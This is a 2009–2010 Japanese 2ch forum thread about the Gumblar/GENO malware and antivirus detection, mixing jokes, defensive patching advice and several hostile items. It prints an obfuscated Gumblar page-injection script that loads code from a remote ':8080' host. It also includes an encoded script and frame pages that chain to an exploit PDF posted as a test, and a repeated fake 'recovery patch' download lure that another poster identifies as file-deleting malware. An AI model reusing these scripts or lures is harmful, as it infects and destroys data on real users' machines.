avast!のWebシールドでも反応しない新ガンブラーが登場at NEWS
avast!のWebシールドでも反応しない新ガンブラーが登場 - 暇つぶし2ch95: ちくわ(東京都)
10/01/08 07:16:47.03 wzmgGs5u
>>93
今もう一回保存してファイルのhashをみたけど前と同じだった

96: 滑車(東日本)
10/01/08 07:17:56.46 ERkw5/xM
>>95
おれはhtmlだけおくったみたい。失礼しました。

97: モンキーレンチ(dion軍)
10/01/08 08:28:12.36 dgNvMWRD
        ゙!:|:::::|::l::|:l::l:;l斗:::'´!|:l:::li| l:::::`!十‐+|:_l:::li::::/,小、{_イ^| ト、ヽ,)
        /ハ:::::!::l::l:{::!::l:::! ::::l:| |:::li| ゙!::::::ト!:::::l:li:::トl:l└vオ  l |/| ゙Y
        / ハ::::!::!:l:|::!゙y,ァネ宀、` ヾヾヽ ,ァ7=!t、:l::|:l:i (勹 j j/}| |
         / /  ヾミ:l::|ヾYオ゙h ::::::}      1i .::::ヽ!:|:li と,フ / !Y::| |
        ヽ/    l`:::`:l|:i ビ_''ツ       ト!、:;;;;::リト川(イリ/ /i::i:l:| |
 あ、バスト?    |:: ::j:!:kXxx  .     `ー--'/,';!::!j゙Y,/ /::|::i:|:| |
           |:: :l:l:ilヽ、   、     xXxx//// }j"lヽ/ :::l::l:|:L_」   
               |:: :l:|:l:|:{:{> 、       ,.  ////!::lj:: l:i l:i i::::|::l:|l
                | :: :l:|:l:|:}{:{:l::l::l:l:` ┬ '  //;ノ」_!_lj::l|:l:l::l::l:::|::l:|l
             j :: :l:|:l:l:{:/´ ̄`ヽ」  /彡'´    `Y:l:l::|: l:::|::::|l
           ,' ::;:'j':l:l:{/   、  ノ,〃/         l:l:l::|:::|:::!::::l:l、
           / :;:'/j:l::l:j     `   {{(            !l l::|: |:::|::::l::li
            /::;:'/:;j:j::jノ      ,..  `))  !        i|:l:l::|:::|:::l::::|::l:i、
.          /:;:'/:::ji/     /r‐‐<`ヽ、 l      .ll:|:l::|::i|:::| ::|::l::l
          l::;'/::/    ,/.r-‐'≠` ヽ.`}|     i!:l:|:l:|::||:::|:::|::|::|
         /´ヾ    ./  i r-、      .| !       !l:|:l::l::|l::: | ::|::|::|
       /´ゝ、_,}    :   し'  }     | .!     ijリ !jl///リ !j }l/
         { ´ ̄ ̄`ヽ  ',       {      |l |       l〃/〃/ /〃/
         ヘ、 二ニニイ   ,      \  ' ´ V !      .|i//  /   /
        }rー-‐‐ァ'、   ヽ、     ヘ    ∨     |


98: シール(東日本)
10/01/08 08:41:44.06 P4Rdn5v+
あ、ババババ

99: 泡箱(神奈川県)
10/01/08 08:52:06.02 7yMN4HaH
最近のは、OSがVista/7だったりしたら動作を変えるようになってるな
UACにひっかかって不審におもわれたりしないように

100: 蛸壺(大阪府)
10/01/08 09:13:39.50 U4Jpc+Sd
MSSEの俺は大丈夫

101: マイクロシリンジ(大阪府)
10/01/08 09:14:24.14 p+dqAbpV
未だにXP使ってる人居るんだww

102: モンキーレンチ(関西地方)
10/01/08 09:15:23.60 /uGUtDvW
この前SecurityToolっていうウィルスみたいなのに感染して
削除したらOS起動しなくなってえらい目に合ったわ・・・

103: 乳鉢(愛媛県)
10/01/08 09:16:10.46 95VXrh4o
どうせアドビをアップデートしとけば無傷なんだろ?

104: レーザーポインター(千葉県)
10/01/08 09:18:35.74 f93a1mI9
avastが
URLリンク(www.spacecraft.co.jp)
このサイトでトロイって反応するけど誤探知?

105: ボウル(アラバマ州)
10/01/08 09:21:13.08 zLrW2kLQ
素のFTPでインターネットからコンテンツ更新させるサイトなんて閉鎖しろ

106: ガスレンジ(catv?)
10/01/08 09:36:21.52 A2+uIIR4
セキュ板の人いる?
今いちばんガンブラー絡みの情報集まってるスレってどこ?

107: 滑車(東日本)
10/01/08 09:37:31.34 ERkw5/xM
>>106
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
スレリンク(sec板)l50

108: 駒込ピペット(福岡県)
10/01/08 09:46:57.21 03c/WkLp
ガンブラーと聞いて
XTOとか黄金砲とか連想してしまった

109: ドラフト(神奈川県)
10/01/08 10:05:52.33 EuuKBnOp
・Windows Vistaもしくは7を一般ユーザー(非管理者)でログインして使う
・Web閲覧には保護モードを有効にしたIE7orIE8を使う
・Microsoft UpdateでOSは最新に保つ
・Adobe Readerはインストールしないか、最新版をJavascript無効にして使う
・Adobe Flashは最新版を使う
・Javaはインストールしないか、最新版を使う
この6つを行えばかなり感染確立が下がる

110: ドリルドライバー(東日本)
10/01/08 10:11:11.85 weXO/2mG BE:556335252-PLT(12001)
sssp://img.2ch.net/ico/foruda1.gif
://orkut-com-br.hattrick.org.wiktionary-org.webnetenglish.ru:8080/google.comgoogle.com/intel.com/vnet.cn/onlinedown.net/

111: モンキーレンチ(東京都)
10/01/08 10:19:07.15 SEXoMUYs
オンラインスキャンでもするか

112: 鉋(アラバマ州)
10/01/08 10:30:13.19 OIlIqCOV
youtubeにavast! proのkeygen上がっててワロタwww

113: 滑車(東日本)
10/01/08 10:42:00.18 ERkw5/xM
>>105
それにも感染してた
URLリンク(www.virustotal.com)

114: ガスレンジ(catv?)
10/01/08 10:52:26.21 A2+uIIR4
>>107


115:ウイルス本体も外部にあってどんどん更新されるわけだろ
10/01/08 10:54:38.09 HBE4CUAg
これさあ・・・SFTP(SSH+FTP)しか更新できなくしててもタメなんじゃね?

116: 平天(広島県)
10/01/08 10:57:29.11 Q1EoUJYP
俺のavast!タンなら、俺が何もしないでも俺を救ってくれると信じてる

117: マイクロピペット(神奈川県)
10/01/08 11:16:52.42 9KwqRsLi
PeerBlock で海外へのHTTP接続を拒否している俺に隙はなかった。

Web閲覧で、海外鯖の怪しいpdfやらflashをブラウザが見に行くから問題なので、
通信自体を遮断してしまえばいい。
日本のサイトに罠置かれたらやばいけど。

118: 硯箱(アラバマ州)
10/01/08 11:18:42.95 xqVVIi84
>>117
つーか海外サイトも普通に見るだろうが
全部遮断したら不便すぎるだろ

119: 封筒(新潟県)
10/01/08 11:20:00.11 cHyUl9IV BE:12694346-PLT(17500)
sssp://img.2ch.net/ico/u_unko.gif
プァープァープァー

120: てこ(大阪府)
10/01/08 11:23:53.27 MUu1TYT4
んで、結局これはうぇbだけが書きかえれるの??
前のgenoみたくwin32\うんとかsqのハッシュやファイル容量
とか増えたり??

121: マイクロピペット(神奈川県)
10/01/08 11:28:26.40 9KwqRsLi
>>118
そういうのはある程度巡回先が決まってるから、そこだけ許可するルールを追加する。
初回はめんどくさいが、一度作れば終わりだし、作業もクリックだけで出来るから特に不満はない。

それでも不便なら、最近は知らんが、GENOウィルスの怪しいpdfが置かれてるサーバは、バルト三国やらロシアやらの
普段閲覧するような国じゃないのでIPリスト拾ってそこだけでも弾けば良いんじゃね?

>>118がロシア人なら知らん。


122: モンキーレンチ(三重県)
10/01/08 11:31:18.64 In7mpC/S
>>115
今のところはパケットキャプチャしかしてないらしいし大丈夫でしょ
キーロガーとか仕込まれたりしたら漏れるかもしれんが
ウィルス仕掛ける側も手間が増えるし面倒くさいだろ。

123: 梁(dion軍)
10/01/08 11:32:03.30 mE/+aasu
>>119
コーヒー吹いたわw

124: ◆SsSSsSsSSs
10/01/08 12:04:07.25 SIukZWYS
>>73
えっ

125: 冷却管(広島県)
10/01/08 12:05:07.23 qrGub+6x
genoってどういうウイルスなの?

126: 夫婦茶碗(catv?)
10/01/08 12:06:39.34 MUNUow0p
おっと、チェンs-好きで良く見てたサイトだ

127: ガスレンジ(catv?)
10/01/08 12:15:11.75 A2+uIIR4
>>122
そんなぬるい考えは捨てた方がいいと思う
毎日どんだけ亜種生産されてると思ってんのよ


128: モンキーレンチ(中部地方)
10/01/08 12:16:37.29 Atznycs9
vistaはセーフだよね?

129: メスピペット(catv?)
10/01/08 12:20:10.98 KptIBMCc
<script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->

130: モンキーレンチ(アラバマ州)
10/01/08 12:21:04.83 I0L8TLMx
>>128
最近のは7でも感染したとかの報告があったから、たぶん駄目だろ

131: 手帳(アラバマ州)
10/01/08 12:25:01.79 oQGEk3JC
これ、アンチウイルスソフトで除去できるの?

除去できるとしたら大手サイトの管理会社が感染してるのが不可解なんだがw

132: ビーカー(アラバマ州)
10/01/08 12:28:08.48 pBxN6Hr/
で、感染したら具体的にどうなるんだよこのヴァイラスは

133: 虫ピン(神奈川県)
10/01/08 12:28:13.97 GI76Eofp
一体何が目的なんです?

134: 手帳(アラバマ州)
10/01/08 12:29:45.17 oQGEk3JC
>>133
どっかのサイト乗っ取りたかったんじゃないの?

135: そろばん(アラバマ州)
10/01/08 12:35:24.62 59BQdmXn
一番初めに対応したウイルス駆除会社があや・・・

136: ブンゼンバーナー(東京都)
10/01/08 12:43:04.28 fH3AulUa
window.onload とかproxomitronで潰してるわ


137: モンキーレンチ(関西地方)
10/01/08 12:43:12.61 IOqrA9yY
>>130
UACにブロックされない範囲だと大したことできないだろ?
UAC無効にしてたんじゃないの?

138: 黒板消し(大阪府)
10/01/08 12:44:46.23 LB6sVH5v
こういう事があった前後のAVソフトの売り上げ推移が見たい

139: 電子レンジ(神奈川県)
10/01/08 12:46:07.66 MQxLHqq7
>>22
AVG何も言って来ねーぞw

140: モンキーレンチ(ネブラスカ州)
10/01/08 12:46:08.30 zicNOoW1
これに感染するとハローワークにしかアクセス出来なくなる

141: 手帳(アラバマ州)
10/01/08 12:49:24.91 oQGEk3JC
>>140
ウイルスのくせに日本救う気なの?

142: 電子レンジ(アラバマ州)
10/01/08 12:49:40.80 FZlyIZI9
で、これ感染したらどーなんの?

143: ◆SsSSsSsSSs
10/01/08 12:49:50.14 SIukZWYS
これはavast先生的にどうなの?


<script type='text/javascript'>document.write(decodeURIComponent(function(r, s) { var t = '', p = -8, a = 0, b, c; for (var i = 0;
i < s.length; i++) { if ((c = r.indexOf(s.charAt(i))) < 0) continue; a = (a << 6) | (c & 63); if ((p += 6) >= 0) { b = (a >> p) &
255; if (c != 64) t += String.fromCharCode(b); a &= 63; p -= 8; } } return t; } ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
vwxyz0123456789+/=', 'JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJG
dXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0UlMEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdX
BndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZiUyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2Vu
LmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUyRnNvdXJjZSUyRnVwMzYxNzAucGRmJTIyJTNFJTNDJTJGaWZyYW1lJTNFJTBEJTBBJTNDaWZyYW1lJTIwc3JjJT
NEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJGdXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0Ul
MEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdXBndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZi
UyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2VuLmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUy


144: 手錠(愛知県)
10/01/08 12:51:49.67 uQMppbg4
薬理作用のある善玉ウィルスですね

145:メガネ(佐賀県)
10/01/08 12:59:50.05 vGjfY4DP
>>143
チェックしたらこんな感じになった
URLリンク(neko2.net)

146: ◆SsSSsSsSSs
10/01/08 13:00:49.06 SIukZWYS
>>145
てかもう死んでるね
URLリンク(2sen.dip.jp)

147: 鍋(アラバマ州)
10/01/08 13:01:24.64 cIw75jAz
proxomitronで対策できないだろうか。

148: ◆SsSSsSsSSs
10/01/08 13:01:51.41 SIukZWYS
ごめんwwwwww生きてたwwww
>>146
注意してネ

149: 電子レンジ(神奈川県)
10/01/08 13:15:33.88 MQxLHqq7
無線LAN経由でID・パスが漏れて感染というケースが一番多そうw
今やWPAにしないと簡単にパケットキャプチャされて漏れるからなー

150: すりこぎ(アラバマ州)
10/01/08 13:20:39.58 TE0AHxjQ
>>1
スレリンク(sec板:405番)
今北さん用、GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す

151: オーブン(東京都)
10/01/08 13:49:49.43 aq4gBrC6
>>147
おみとろんじゃないけど、念のためFWのフィルタに↓つっこんでる
.ru:8080/
.cn:8080/
これで落とそうとする物が防げる、はず

でも、>>150の特に>(3)「Acrobat JavaScriptを使用」のチェックをクリア
をやっておけば、とりあえず大丈夫じゃないかな

152: メスシリンダー(沖縄県)
10/01/08 14:21:30.27 iarCLPLD
これはネット史上最悪レベルのウイルスになりそうだな・・・

153: 包丁(東京都)
10/01/08 14:23:31.73 GCS0qpTq
これからの時代はヒューリスティックでしのぐとか言ってた
NOD32は防御できてんの?

154: 篭(アラバマ州)
10/01/08 14:26:32.61 qW8Z6kcA
クラウド使ったpanda最強

155: 試験管(静岡県)
10/01/08 14:29:51.58 0TrH6utJ
またXPユーザーが血祭りに上がってるのか
さっさとVistaや7にしろよ


156: ムーラン(宮城県)
10/01/08 14:31:04.53 uT776Yc5
UACで根本的に解決すればいいのにあほやね

157: 電子レンジ(神奈川県)
10/01/08 14:44:18.31 MQxLHqq7
>>152
キンタマには勝てないなw

158: モンキーレンチ(catv?)
10/01/08 15:01:36.16 HTtcnhM9 BE:706369829-2BP(7777)
sssp://img.2ch.net/ico/peter.gif
>>146
俺の上げたup36170.pdfのURLを貼るなよww
脆弱性テスト用のPDFだお
穴がある場合カワイソスのダイアログが表示されるおっお

159: 製図ペン(北海道)
10/01/08 15:09:52.02 H+nRW8Us
>>145
これなんだ?Microsoft Security Essentials反応したんだけど。
Foxit Readerもフリーズしたぞ。

160: ドラフト(アラバマ州)
10/01/08 15:14:33.64 Gk2pkqzc
>>146保存しようとおもたら反応した

161: モンキーレンチ(catv?)
10/01/08 15:16:05.77 HTtcnhM9 BE:1373494875-2BP(7777)
sssp://img.2ch.net/ico/peter.gif
>>159
up36170.pdfが山のように埋め込まれているようだ

162: フラスコ(東京都)
10/01/08 15:19:01.49 CKwWbtAF
ガンブラーに関してはavast!が最強だったから、
対avast!用に改良したのか


163: 両面テープ(福井県)
10/01/08 15:19:42.06 Bo+QbbEp
>>145
保存推奨かとw俺はmseだからよかったけど、これ凄いなw


164: じゃがいも(独)
10/01/08 15:22:54.09 Ut0AV2wa
>>158
おい、いたら返事

165: じゃがいも(独)
10/01/08 15:23:38.98 Ut0AV2wa
>>161
おーい

166: ボールペン(青森県)
10/01/08 15:24:54.08 vjhoZHEE
久々にプァーンプァーンプァーンを聞いた。

167: ミリペン(千葉県)
10/01/08 15:33:19.08 LZKMcHdY
>>165
小池

168: モンキーレンチ(catv?)
10/01/08 15:46:49.22 HTtcnhM9 BE:1765922459-2BP(7777)
sssp://img.2ch.net/ico/peter.gif
>>164
<●><●>

169: 炊飯器(アラビア)
10/01/08 15:48:09.89 oS4WK5uz
>>168
シベリアで君の模倣犯が大暴れしてるよ
心当たりある?

170: モンキーレンチ(catv?)
10/01/08 15:49:23.93 HTtcnhM9
>>169
なん・・だと!?
kwsk

171: 硯(アラビア)
10/01/08 15:52:24.39 biIh+wbf
>>170
スレリンク(siberia板:106番)
こんな感じのマルチポストが89件

スレリンク(siberia板:188-189番)
ここにkawaisosuというのがあるから、もしかしたらと思って聞いてみた

172: モンキーレンチ(catv?)
10/01/08 15:54:51.85 HTtcnhM9
1138406800/106はシラネ
ソースコードを配布したのが不味かったのか・・・

ちなみに1262099561/188-189はどう考えても俺です、ありがとうございました

173: 釣り竿(アラバマ州)
10/01/08 16:00:03.70 L6F5RX+3
ガンブラー自己中心派

174: マイクロピペット(山口県)
10/01/08 16:02:04.52 oTlGFwoN
踏んだことある中じゃレベル低いよなこのウイルス
今までで最強はbios破壊された奴だ
お陰で立ち上がらなくなって初めてマザボのbios復旧機能が役にたった

175: 丸天(catv?)
10/01/08 16:02:58.11 xceqYztC
avira最強じゃね

176: 綴じ紐(茨城県)
10/01/08 16:03:09.36 T7myWTrZ
         .l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人  \ !!大激怒!! //   U    :::U:
ぶっ壊れ(__)   \ !!!!! / // ___   \  :::
たお! (__)    \∧∧∧∧/   |  |   |    U ::::
     (`Д´#)   < ぶ パ >   |U |   |     ::U:
   _| ̄ ̄||_)_ <  っ ソ >    | ├―-┤ U.....::::
 /旦|―||// /| < 壊 コ >    ヽ     .....:::::::::
─────< れ ン >─────
<   _,ノ , 、ヽ、_ ノ< た 蛾>  プスプスプス・・・・・∬∬
 (y○')`ヽ) ( ´(y○')<  !!!   >踏んじゃったよぉ___
  ⌒ /    ヽ⌒ /∨∨∨∨\   ∧_∧  ||\  
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`)  || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \(  つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」


177: ダーマトグラフ(catv?)
10/01/08 16:06:05.47 IU/s4x6H
>>171
Good bye 9010
すでにBBQされています(´・ω・`) -> [BBQ]Roasted(-_-)

焼き串美味しいです^^

178: モンキーレンチ(dion軍)
10/01/08 16:07:10.83 Rm8qPeY2
>>174
それってXPより前?それともXP以降の話?

179: マイクロピペット(山口県)
10/01/08 16:08:11.21 oTlGFwoN
>>178
XP SP1か無印の頃

180: モンキーレンチ(アラバマ州)
10/01/08 16:16:39.85 VKEoi2Vu
>>172
覚悟しておいてね

181: ホールピペット(滋賀県)
10/01/08 16:17:43.80 PZ2XT8cC
>>146
ウィルス検出通知 (VIRUS DETECTION)

指定したウェブページ中にコンピュータウィルスを検出しました。
あなたのコンピュータがウィルスに感染することを防ぐため、指定したウェブページの内容は表示されません。
このメッセージは、接続先のウェブサーバがウィルスに感染している可能性を示すものであり、あなたのコンピュータがウィルスに感染していることを示してはいません。

Computer virus was detected from the contents of this web page.
This page is not displayed to prevent computer virus from infecting your computer.
This message inform that the connected web server may be infected with virus.
And this message does not inform that your computer is infected.

VIRUS NAME: Exploit.JS.Pdfka.aio

Powered by F-Secure Anti-Virus Gateway for Linux

|-゚)

182: 包丁(東京都)
10/01/08 16:21:14.39 GCS0qpTq
>>174
本物のウイルスと同じで致死性が高いと拡散しにくい

183: 製図ペン(北海道)
10/01/08 16:21:42.06 H+nRW8Us
え?やばいの?テスト用なんでしょ・・・・・心配になってきた。

184: モンキーレンチ(catv?)
10/01/08 16:22:00.48 HTtcnhM9
>>180
何を覚悟しろとwww

185: ラベル(茨城県)
10/01/08 16:25:46.78 c6Dcv/HC
nod32以外糞
異論は認めへん

186: 冷却管(catv?)
10/01/08 16:26:10.28 BLtoVUOt
【緊急】ガンブラー復旧パッチ使用手順。
URLリンク(www.so-net.ne.jp)
URLリンク(www14.atpages.jp)

手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。

187: ラベル(茨城県)
10/01/08 16:28:13.55 c6Dcv/HC



















(){eval(unescape(('Script(t,'%')))})(/./g);

188: ばね(兵庫県)
10/01/08 16:29:35.94 B2n63oG4
>>145
VISTAで踏んだところものすごくファンファン言った

感染してるの?

189: 二又アダプター(愛知県)
10/01/08 16:30:08.60 oDixb6wY
>>145
なにこれPC固まった

190: モンキーレンチ(catv?)
10/01/08 16:30:22.21 HTtcnhM9
>>183
あのPDFはCVE-2009-0927のPoCを弄った物だお
→実行されたとしてもダイアログを表示するだけ←
そんなに心配ならソースコードうpするお・・・

191: 製図ペン(北海道)
10/01/08 16:33:33.36 H+nRW8Us
>>190
サンクス。本当のやつかと思ったので。
>>186
そういうことは止めなさい。日本人の良心って破綻してる。朝鮮人の事言えないなw

192: 手枷(静岡県)
10/01/08 16:36:12.62 mDUjRL0s
>>191
そいつは日本人じゃないんだろ

193: 集気ビン(石川県)
10/01/08 16:37:42.92 ZZJiFEVj
>>186
URLリンク(online.us.drweb.com)
> fukkyuu0.exe infected with BAT.KillFiles.26

URLリンク(www.virustotal.com)
> File fukkyuu0.exe received on 2010.01.08 07:35:11 (UTC)
> Current status: finished
> Result: 29/41 (70.74%)

194: 製図ペン(北海道)
10/01/08 16:38:38.40 H+nRW8Us
あ、ごめん。ほんとうのレジストリ復旧のやつぽい(^^ゞ
だめだ。最近、どうもZIPだの見ると疑ってしまう ORZ

195: 製図ペン(北海道)
10/01/08 16:39:47.20 H+nRW8Us
あ~なんだ。やっぱりそうかいw

196: ばね(兵庫県)
10/01/08 16:39:52.53 B2n63oG4
>>145
これ踏んだ奴はオンラインスキャンしとけ
仕込まれてるぞ

197: 印章(神奈川県)
10/01/08 16:41:55.64 slVytE34
持ってて良かったJane

198: フライパン(catv?)
10/01/08 16:42:13.25 +3qfZx57
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
                        |
       ____.____    | .__  いらないPCを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: | >>186
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄



 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――‐┬┘
                 |
   ____.____  |
  |        |..__   | |
  |        | |\_\. | |
  |        | | . |.◎ |つ |ミ   ∧_∧
  |        | | . |:  | | |    (´・ω・)>>187
    ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄  |   ⊂ ⊂ )
                  ⊂ ⊂ ,ノ

199: モンキーレンチ(catv?)
10/01/08 16:42:43.62 HTtcnhM9
>>196
>>161
>>190

200: 和紙(北海道)
10/01/08 16:42:56.14 SY8AC1xP
ただの画像だろ?
画像踏んだだけでウイルスに感染するわけないじゃんwwww

201: 試験管(静岡県)
10/01/08 16:44:55.88 0TrH6utJ
>>145
専ブラでクリックしたら
Content-Type:text/html
と出るだけで、画像が表示されないです><
感染しちゃったの?><

202: モンキーレンチ(dion軍)
10/01/08 16:46:51.85 Rm8qPeY2
してない

203: スパナ(dion軍)
10/01/08 16:47:30.51 qHW/1LW8
MSE使わないバカは何考えてるの?

204: 両面テープ(福井県)
10/01/08 16:49:19.36 Bo+QbbEp
>>145
MSEならExploit:JS/Mult.CDで検出できるよ。

205: オープナー(栃木県)
10/01/08 17:00:02.32 ERpSMR1B
MSE使ってたやつは感染してたろ
今対応してるかどうかより対応の早さが重要
MSEはその点駄目

206: ホワイトボード(中国地方)
10/01/08 17:01:43.14 ZPAG/yBd
64bitOSでも感染するの

207: ラジオペンチ(福岡県)
10/01/08 17:03:43.11 MfpFAFRp
FreeBSD俺に死角はなかった

208: ボンベ(鹿児島県)
10/01/08 17:04:31.78 9O1x9tqb
こないだ起動しなくなって(真っ黒画面にカーソルだけピコピコ)
再インストールしたんだけどもしかして感染してた?
ググったら症状まったく一緒なんだが・・・。
とりあえず考えられるもの全部最新のにして
2~3日経ってるんだけど、なんかヤバいかな?
今、とりあえず、スキャンしてる

209: モンキーレンチ(catv?)
10/01/08 17:07:44.10 HTtcnhM9
URLリンク(neko2.net)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<META name="Keywords" content="">
<META name="Description" content="">
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="100%">
<FRAME name="main" src="URLリンク(wavlac.net)">
<NOFRAMES>
<BODY>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>

210: 烏口(catv?)
10/01/08 17:08:00.14 GmJikerv
>>203
今日初めて知った

211: 画板(長屋)
10/01/08 17:13:58.57 hmgBE72U
>>150は実行したけど、すでに感染してるかをどうやって確認すりゃいいの?

AVG入れてるけど、金払ってねえから、あんまり役に立たないだろうし。

212: フライパン(東京都)
10/01/08 17:14:20.32 doQhveJJ
情弱は>>150をやれヴぁいいの?


213: るつぼ(神奈川県)
10/01/08 17:15:17.94 poAfmzpK
Adobeは自動即時アップデートを導入しろカス
いちいち確認するのめんどいんだよ

214: ボウル(アラバマ州)
10/01/08 17:19:48.39 zLrW2kLQ
>>213
アドビ、ユーザーの関与なしに自動アップデートする仕組みを検討
URLリンク(japan.zdnet.com)

215: るつぼ(神奈川県)
10/01/08 17:21:02.66 poAfmzpK
>>214
サンクス
ようやくか

216: 原稿用紙(東京都)
10/01/08 17:22:40.49 jG5V/7rQ
こううスレを専ブラ以外で開こうとは思わない。

217: 漁網(兵庫県)
10/01/08 17:23:30.36 nY5mqsGu
チェックサイト
URLリンク(azcji.cocolog-nifty.com)


とか言って騙してやろうと思ったが改善されてた

218: モンキーレンチ(catv?)
10/01/08 17:30:02.03 HTtcnhM9
>>209
URLリンク(wavlac.net)

<iframe src="噂のup36170.pdf"></iframe>
          ・
          ・
          ・

219: ラベル(茨城県)
10/01/08 17:34:30.74 c6Dcv/HC
【緊急】ガンブラー復旧パッチ使用手順。
URLリンク(www.so-net.ne.jp)
URLリンク(www14.atpages.jp)

手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。

220: モンキーレンチ(アラバマ州)
10/01/08 17:35:19.51 QQXPUJsp
昨日再インストールして
今VistaSP2をウィルス対策ソフトなしで使ってる。

まぁユーザーアカウント入ってるしなんとかなるでしょ・・・・

いや・・・今日中にAVGイレマスヨ?

221: カッターナイフ(韓)
10/01/08 17:36:16.94 7zC0pQL2
AVIRA最強

222: モンキーレンチ(アラバマ州)
10/01/08 17:36:25.50 PHg2Bd5v
ウイルス対策どうのこうのより脆弱性さっさと修正しろよカス

223: モンキーレンチ(catv?)
10/01/08 17:44:04.77 HTtcnhM9
>>219
何だよこのファイル
UPXで圧縮された上怪しげな文字列が・・・passwordって・・・

224: 霧箱(アラバマ州)
10/01/08 17:44:58.01 rO5nPoKM
やった!反応した!

225: 霧箱(アラバマ州)
10/01/08 17:47:50.77 rO5nPoKM
>>187
お前警察に通報したからな
プロバに連絡して対処してくれるって警察の人が言ってた

